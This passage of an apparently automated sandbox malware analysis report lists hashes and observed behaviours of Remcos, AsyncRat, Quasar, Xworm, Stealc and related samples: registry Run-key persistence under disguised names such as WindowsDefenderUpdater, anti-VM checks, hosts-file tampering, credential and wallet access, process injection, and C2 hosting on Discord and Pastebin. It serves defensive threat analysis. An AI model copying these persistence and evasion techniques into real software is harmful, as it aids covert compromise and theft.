| SHA512 | cf21a82cb346b0824a309d9f3b75a1806eb5ec1bf8f7eb184f054a61fdbb2d580af9558e6704ee8dfab254b9402e6e04de94b3d7bb498277a1cd9fd51fd9c37b |
\Users\Admin\AppData\Local\Temp\_MEI28762\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | 3b15cc8aab69fc0931e0d79be7878eb2 |
| SHA1 | ddb14a5ad8d8937c3d7dcede3fbc0b930a765290 |
| SHA256 | 6333cba577889ac1b0f715c7b4cf66d7b566ce18555a81662e879192907e76e1 |
| SHA512 | 1b6880b527d82de3fa770a51117e662efb3b6e2c84b5edc28ed0c60b1ae24f51622217c292e91121de4b9523d2a6ac51b824648fa2af688618188b904e04ce67 |
C:\Users\Admin\AppData\Local\Temp\_MEI28762\python312.dll
| MD5 | 166cc2f997cba5fc011820e6b46e8ea7 |
| SHA1 | d6179213afea084f02566ea190202c752286ca1f |
| SHA256 | c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546 |
| SHA512 | 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-26 22:53
Reported
2024-11-26 22:56
Platform
win10v2004-20241007-en
Max time kernel
78s
Max time network
150s
Command Line
Signatures
Ammyy Admin
AmmyyAdmin payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Ammyyadmin family
AsyncRat
Asyncrat family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
FlawedAmmyy RAT
Flawedammyy family
Phorphiex family
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Remcos
Remcos family
Stealc
Stealc family
Xworm
Xworm family
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\hhnjqu9y.exe | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\ProgramData\tst\remcos.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\tst\remcos.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\hhnjqu9y.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\hhnjqu9y.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\VBVEd6f.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\contorax.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\86635797.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\java.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\ProgramData\tst\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\AppData\Local\Temp\Files\o.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\ProgramData\tst\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Subsystem Framework = "\"C:\\ProgramData\\Microsoft Subsystem Framework\\winmsbt.exe\"" | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Files\hhnjqu9y.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\java.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\java.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\java.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\java.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\java.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\java.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\hhnjqu9y.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1900 set thread context of 940 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\5447jsX.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 3392 set thread context of 5248 | N/A | C:\ProgramData\tst\remcos.exe | \??\c:\program files (x86)\internet explorer\iexplore.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\Files\o.exe | N/A |
| File opened for modification | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\Files\o.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Files\njrat.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\BeamNG.UI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\maza-0.16.3-win64-setup-unsigned.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1757527941.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\5447jsX.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\VBVEd6f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\o.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\sysnldcvmr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\tst\remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\hhnjqu9y.exe | N/A |
